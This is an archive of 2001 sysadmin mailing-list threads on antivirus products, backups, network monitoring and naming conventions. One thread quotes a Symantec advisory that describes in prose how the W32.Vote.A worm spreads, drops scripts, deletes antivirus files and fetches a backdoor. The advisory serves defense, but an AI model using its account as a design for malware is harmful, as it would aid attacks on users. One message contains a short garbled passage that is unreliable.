RE: InoculateIT opinions
Title: RE: InoculateIT opinions I could swear Roger of Peregrine did an analysis of what was out there. Care to share? Sophos, for example, doesn't get much ink either. -Original Message- From: Steve Frenzl [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 11:51 AM To: NT System Admin Issues Subject: InoculateIT opinions My company is looking for a workgroup AV and I was curious what the opinions were of Inoculate. From past threads, the consensus seems to be that Norton is better than Mcafee but I don't remember seeing Inoculate discussed. Any input is appreciated. Steve Frenzl Systems Administrator Farmer Automotive Group Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Network Traffic
Title: RE: Network Traffic Our host, Sunbelt, has Netboy. suck up points? -Original Message- From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 1:57 PM To: NT System Admin Issues Subject: RE: Network Traffic Well, My boss doesn't mind spending the cash (unless we talking about 20K or more, then It's paperwork HELL!) as long as I can prove the tool has some worth. He is big into monitoring :) -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 4:52 PM To: NT System Admin Issues Subject: RE: Network Traffic If you're willing to spend the $$$ take a look at Packeteer PacketShaper -Original Message- From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 1:50 PM To: NT System Admin Issues Subject: Network Traffic Heyas! Can anyone suggest a good tool for network traffic monitoring? We have all HP Procurve Switches and use TopTools, but it doesn't seem that good (unless im just missing some config options). For example we wanted to track down a user that was pegging our T @ 97% utilization (he had 15 family guy downloads on morpheus at the same time) and TT did not tell us much. We finally tracked him down by using firewall logs...kind of time consuming Any good ideas Cheers Carlos Garcia-Moran Senior Network Engineer Athenahealth, INC 781.392.0157 Main 617.543.1701 Cell [EMAIL PROTECTED] Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Backup - recommendation please?
Title: RE: Backup - recommendation please? Unless I got my demos crossed, I thought it could handle open files. You should be able to retrieve a deleted e-mail immediately if I'm not mistaken (I know, bad example) -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 2:18 PM To: NT System Admin Issues Subject: RE: Backup - recommendation please? Doesn't Live Vault backup the file only after it is closed? It appears as if some files never get closed. But Live Vault is a solid choice. Greg -Original Message- From: Dempster, Mark [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 12:30 PM To: NT System Admin Issues Subject: RE: Backup - recommendation please? Thanks, Mark (and everyone else that replied). I'll look into that. Mark -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 02:47 To: NT System Admin Issues Subject: RE: Backup - recommendation please? Yes, LiveVault is what you are looking for. Real time backup. http://vs46311.server-store.com/store/page.inetstore?id=3 http://vs46311.server-store.com/store/page.inetstore?id=3 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: September 28, 2001 9:04 AM To: NT System Admin Issues Subject: RE: Backup - recommendation please? Seems to me something like livevault (I think that was it) would work. -Original Message- From: Dempster, Mark [ mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] Sent: Friday, September 28, 2001 2:03 AM To: NT System Admin Issues Subject: Backup - recommendation please? Hi, I'm looking for a backup solution for a new customer. We normally use unenhanced versions of Backup Exec or Arcserve, back the system up out of hours. Unfortunately this customer needs to work 24/7. The software my company produces uses a well-known accounting package at its core, which stores its data in a very large number of files which are related to each other. It isn't possible to use a normal 'backup open files' approach since if two related files are backed up - but new data has been added in-between - restoring them will leave the system in an inconsistent state. So, I think what's needed (if such a thing exists) is a product that will take a snapshot of an entire directory (inc. subdirs) and back that up - while leaving the system usable (a moderate slowdown is acceptable). Does anyone know if there's an add-on for our normal backup tools (or even a completely different product) that can do what I'm asking? If so, what's your experience of it? Thanks, Mark Mark Dempster Technical Consultant Infor:Swan Business Solutions Me transmitte sursum, Caledoni! _ This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ _ This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service. _ This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: InoculateIT opinions
Title: RE: InoculateIT opinions As a Panda user, I can only ask 'why?' -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 2:46 PM To: NT System Admin Issues Subject: RE: InoculateIT opinions And yet Boeing chose Panda for their huge deployment. -Original Message- From: David Hekimian [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 2:46 PM To: NT System Admin Issues Subject: Re: InoculateIT opinions Steve, Seriously take a look at TrendMicro's virus scan offering - OfficeScan Corporate Edition. I've used Symantec's Norton Antivirus, CA's InoculateIT, McAfee's VirusScan and countless others.. TrendMicro does workgroup AV right! From a centralized managemnet console (web based) to deploy to new users, set policies on the local client (Set whether the user can disable OfficeScan or not, etc.), and automatic updates of virus definitions and deployment to desktops. Also, Look at TrendMicro's NeatSuite. It a combination of OfficeScan, ScanMail and InterScan Viruswall for about the same price as just 1 of the products. - David - Original Message - From: Steve Frenzl [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Friday, September 28, 2001 11:50 AM Subject: InoculateIT opinions My company is looking for a workgroup AV and I was curious what the opinions were of Inoculate. From past threads, the consensus seems to be that Norton is better than Mcafee but I don't remember seeing Inoculate discussed. Any input is appreciated. Steve Frenzl Systems Administrator Farmer Automotive Group Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Message Find an undelete program and see if they show up. -Original Message-From: Greg Page [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 4:33 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Gremlins are doing it. We used to occasionally lose WINS entries every once in awhile and no one could connect to the server. That was with NT 4.0. With 2000,I haven't had any issues like that. Greg -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 3:10 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Nothing in the event logs. I thinik I will turn on auditing. Today the files were gone in a matter or 1 hour after I copied them in the directory. John -Original Message-From: Ian Kelly [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 2:59 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Anything in the event logs? Is auditing turned on? Ian-[EMAIL PROTECTED]-To assume makes an ass out of YOU. Leave ME out of this. -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: September 28, 2001 13:40 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I just ran an AV on the server. No virus. John -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message-From: Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:44 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that
RE: Exchange/Outlook Alternatives
Title: RE: Exchange/Outlook Alternatives Aren't there a couple ASP-type companies out there providing this kind of service? I think some are even using Exchange. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 5:08 PM To: NT System Admin Issues Subject: RE: Exchange/Outlook Alternatives Mark - We're in the same boat. Regardless of how many times I ask the same question, I get the same answer - nothing compares to Exchange. As servers are cheap in the overall scheme of things - if the company can not afford to do Exchange, I still rely on ISP mail. In between the ISP and the office, I use a software product called Software 602 which handles the pull portion. In addition, I looked at the email from Deerfield but am REALLY pissed at them and will not resell or purchase any of their products anymore. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mark [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 7:56 PM To: NT System Admin Issues Subject: Exchange/Outlook Alternatives I'm constantly asked for recommendations on VIABLE alternatives to the MS Outlook/Exchange groupware system. Let's face it: Exchange is expensive, and does a lot of things that most of my SMB customers will never need. I've seen a few different products, but have yet to find one that integrates and works as well as Outlook with an Exchange server. Do you guys have any ideas on substitutes. The main core features that most SMB's use would be the scheduling/calendaring , POP/IMAP email, and address book. It'd be nice to have the whole lot integrated, but seperate products with a good UI would do. The email and address book clients are easy enough to find, but what about calendaring? Something with the ability to both share an office calendar, and have seperate (but viewable) calendars for each worker. Editor priveleges for a secretary on specific calendars would be a plus, as well. To complicate it a bit further, how about something that would work on a peer-to-peer network ( 10 PC's) with no dedicated server? Any thoughts? Y�Z鏶zm 6岒wᮚ'{lמu(@A:牤w-i0⁵m歫^req楨 Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: List or BBS
I don't get it. If you don't like the e-mail, then say NO MAIL and read/respond tothe postings thru the website. Or get the digest. -Original Message-From: Chris Shattock [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:06 AMTo: NT System Admin IssuesSubject: List or BBS These lists are a PITA - but not worth giving up. Have you (Sunbelt) or this forums' correspondents considered using a Bulletin Board System - such as that by Infopop - Ultimate BBS. A couple of years agoin the (Y)UK The Professional Contractors Group (anti-IR35) set their 'forums' up this way - and it ran far better than a list - I believe it's still going - but a lot of others use Ultimate BBS - check from http://www.infopop.com/ I am not a reseller etc. - but it is a real pain dealing with a list when all you can get a 64K ISDN BRI in some 'third-world' country with a crap telecomm. system and you need that link for remote sysadmin/support/development. A BBS would enable me to use my connection more efficiently - and may ease your (Sunbelt) admin. issues. Chris ShattockWant to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Intermittent Network logon problem
Title: RE: Intermittent Network logon problem Never used setprfdc. Does it tell you that it connected to the DC that you think it should connect to? Somebody posted a way to see what DC your authenticated against. -Original Message- From: Troy Rambo /278 Systems Specialist [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 6:26 AM To: NT System Admin Issues Subject: Intermittent Network logon problem One of our BDC's (our DNS server) on our NT4 network went down two weeks ago and was unrecoverable, so we had to rebuild it from scratch. Ever since then we have had an erratic logon problems throughout our network. Yes we are running DHCP. It's all one subnet and each different building has it's own BDC that the users are pointed to using setprfdc to use as their preferred domain controller. When logging on, my users will occasionally not get their logon script to run even though they are logged into the network. Upon reboot and relogging in, it then it maps fine. It's never on the same machine twice, and it's in every corner of our network across three linked building across two city blocks. Sometimes it takes turning the machine off for a couple of minutes before rebooting in order for it to connect to the BDC to run their script. I'm running out of ideas here. Does anyone have any ideas how I can troubleshoot this? I'm going nuts running all over the place, trying to figure this one out. Your ideas are greatly appreciated. Thanks Troy Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Workstation Naming Standards
Title: RE: Workstation Naming Standards Our servers were named after Little Rascal characters, because before-my-time they had a contest.At least it's easier to explain that Darla does this and Spanky does that. I worked for anintegrator that came up with these really cryptic server names based on location/function, and frankly I've yet to see an advantage.It only helped OUR people if we came back, which of course we rarely did. The important thing is you can find the machine for both troubleshooting and inventory. -Original Message-From: Miley, Dan [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 7:11 AMTo: NT System Admin IssuesSubject: RE: Workstation Naming Standards 3 digit city, 1 digit OS, then machine inventory/asset tag# (this ties it back to the inventory and username.) looks like we may be doing something similar with servers soon. I don't like the way 2000 automatically names machines domainname-randomalphanumeric. totally useless for finding machines. I did work at one site where they named their servers after star trek characters. it sounded funny when they said "Spock crashed again", " Can you reboot Spock". Dan -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 2:06 PMTo: NT System Admin IssuesSubject: RE: Workstation Naming Standards I use the user name, but I've got a small 50 person installation. I change the name if the person changes. It simplifies figuring out who's having a problem, because I know everyone. Tougher in a large organization. I sure as heck wouldn't agonize over it. You want to be able to browse a list to pinpoint who's having a problem. And if necessary tie that back to some inventory/allocation information. Serial Number would probably work if you have a good inventory system. -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 10:11 AM To: NT System Admin Issues Subject: RE: Workstation Naming Standards I don't use user names. What happens when that employee quits? You have to rename their machine as part of setting up a new user? I would use City_Dept_JobFunction then add a number for multiple job functions. DJ -Original Message- From: Osama S. [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:05 PM To: NT System Admin Issues Subject: Workstation Naming Standards hi, we will be deploying Win2K from scratch on the user's machines (around 700) replacing NT 4. SO I was reviewing our machine naming convention. Our Offices are located in two cities, one single domain. So far we would use something like "CityName-Department-User Real Name" (where city name and department are abbrevations) to name workstations. Usually the NT Names are the users Company ID, which is unique. I was wondering how you guys/girls are naming your workstations and users. regards Uso Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ This e-mail may be privileged and/or confidential, and the sender does not waive any related rights and obligations. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. If you received this e-mail in error, please advise me (by return e-mail or otherwise) immediately. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Another F(*^ virus!
Title: Another F(*&^ virus! thanks. Still don't see a virus-specific newsletter with alerts like other vendors seem to have. And they were way, way behind in getting the Nimda and Vote defs out the door. -Original Message-From: Lagerstrom, Lanette [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 4:44 PMTo: NT System Admin IssuesSubject: RE: Another F(*^ virus! Just FYI -- * VIRUS CENTER Panda Software and the Windows 2000 Magazine Network have teamed to bring you the Center for Virus Control. Visit the site often to remain informed about the latest threats to your system security. http://www.secadministrator.com/panda Lanette Lagerstrom Northrop Grumman Information Technology Internal Information Services Network Administrator -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 6:51 AMTo: NT System Admin IssuesSubject: RE: Another F(*^ virus! Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know. -Original Message-From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]Sent: Monday, September 24, 2001 4:03 PMTo: NT System Admin IssuesSubject: RE: Another F(*^ virus! According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop? -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Monday, September 24, 2001 4:37 PMTo: NT System Admin IssuesSubject: Another F(*^ virus! Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Symantec Security Response http://securityresponse.symantec.com W32.Vote.A@mm Discovered on: September 24, 2001 Last Updated on: September 24, 2001 at 09:56:27 AM PDT W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products. Type: Worm Infection Length: 55,808 Bytes Virus Definitions: September 24, 2001 Threat Assessment: Wild: Low Damage: High Distribution: High Wild: Number of infections: 0 - 49 Number of sites: 3 - 9 Geographical distribution: Medium Threat containment: Moderate Removal: Moderate Damage: Payload: Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook Deletes files: After reboot, the worm attempts to delete all files in the Windows folder Modifies files: All files with the extension "htm" or "html" will be overwritten. Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer. Distribution: Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Technical description: W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows. Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM! Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace! Attachment: WTC.EXE Next, the worm will insert two .vbs files on the system: \Windows folder\ZaCker.vbs \Windows\System folder\MixDaLaL.vbs In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus. What the dropped files do MixDaLaL.vbs MixDaLaL.vbs is a Visual Basic Script file that is inserted in the \Windows\System folder. This file is executed by the worm. As the file is executed, it will look through all folders on all fixed drives and network drives for files with the extensions .htm or .html. If such a files are found, they are
RE: Testing 1, 2, 3 - Ignore
Title: RE: Testing 1, 2, 3 - Ignore Exactly my goal in life. Make more money and hire you guys to make it work grin -Original Message- From: Dave Gushi [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:56 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore This is very funny stuff. It seams the more money some managers make the less they know. I have a VP that thinks the closer he is to the server the better data response he's going to get. Dave Gushi God Bless America! -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:50 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore almost as bad as a mangaler (manager) that I had that constantly told people that we had an AtherNet (can you say ethernet) network running Novel (as in book) Server. I didn't have the heart to tell him that we were actually broken ring... Two more sleeps til Vegas (1) (1) Hi William -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 17:45 To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Did you hear the wind? I had a tech manager years ago that referred to all networks as LAND's and portables as Labtops. Thought the joke would transfer. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:43 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore No, but he may be trying to setup that LAN -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:41 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Uh huh, trying to set up that LAND aren't you? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:38 PM To: NT System Admin Issues Subject: Testing 1, 2, 3 - Ignore Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: ArcServeIT vs. Backup Exec
Title: RE: ArcServeIT vs. Backup Exec Don't forget to check out UltraBac too. -Original Message- From: Stephen Moreau [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:02 PM To: NT System Admin Issues Subject: Re: ArcServeIT vs. Backup Exec Dan, I have no experience with Veritas but I'm thinking of switching to it. I've been using Arcservit for some time and I have to agree that their support really *stinks*. I'm currently using Arcserveit 2000 and was having a ton of trouble with it. I finally spent 2 hours on the phone being bumped around until someone with a *little* knowledge showed up. Basically, if you install Arcservit 2000 make darn sure you install the latest and greatest patches starting with SP2. Some of my experiences were: 1. Full backups not happening and the temp directory becoming full. 2. Could not read the status or details of a tape without first using the inventory feature. 3. Very slow to back up Snap Servers. 4. Database getting corrupt. Since I applied SP2 and all the latest patches everything seems to be fine with the exception of one continuous problem: If I make a modification to a backup schedule then SAVE it then use the little -x- in the top right corner to close it the program freezes and I have to use task manager to kill it. I refuse to call their tech supportless group anymore. Good luck! Stephen Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Monitoring email
There's tools like ISSCAN that will help find e-mails, but there's no content filtering in Exchange. -Original Message-From: Neil Harvey [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 7:13 AMTo: NT System Admin IssuesSubject: Monitoring email Does anyone know if exchange 5.5 sp4 has the ability to scan and monitor emails for certain content. If I can help it I don't want to have to buy a third party product. Neil HarveyMCP, MCP+I, MCSE, CNAIT Manageremw lawDDI: +44 (0)1604 666425Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Win2k Cluster and Mac Shares
Title: RE: Win2k Cluster and Mac Shares http://www.thursby.com/products/dave.html -Original Message- From: Matt Moore [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:36 AM To: NT System Admin Issues Subject: Re: Win2k Cluster and Mac Shares can't remember the mfg. but there is a software named dave that allows macs to browse nt domains like a pc, sort of. it's worked good for me. no special mac crap on the network. just on the local mac. Matt Moore MCSE, MCP+I, NCSS, HP - Original Message - From: Joseph [EMAIL PROTECTED] Newsgroups: ntsysadmin To: NT System Admin Issues [EMAIL PROTECTED] Sent: Wednesday, September 26, 2001 7:49 AM Subject: Win2k Cluster and Mac Shares Any one know if mac shares will work within the cluster? When you create them at the share management level you have the option for the macintosh name, but when you add a file share resource to the cluster you do not get this. Haven't tested it yet. Was hoping to get some feedback first. Thanks Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Backup Slow
Title: Backup Slow Read the logs and compare it to an old log. -Original Message-From: William Smith [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 8:26 AMTo: NT System Admin IssuesSubject: RE: Backup Slow Check under the job-- Advanced tab Make sure "Verify after backup completes" isn't checked. That would definitely double the time. W -Original Message-From: Dominick Romano [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 11:32 AMTo: NT System Admin IssuesSubject: Backup Slow Hello, we backup our servers with a Dell DLT 7000 7 Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some strange reason it is taking double the amount of time to backup than it used to. Does anyone have any ideas? Thanks. Dominick Romano Junior NT Administrator Kravet Fabrics, Inc. Tel: 516-293-2000 Ext: 637 Fax: 516-293-2158 mailto:[EMAIL PROTECTED] Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: satellite connection
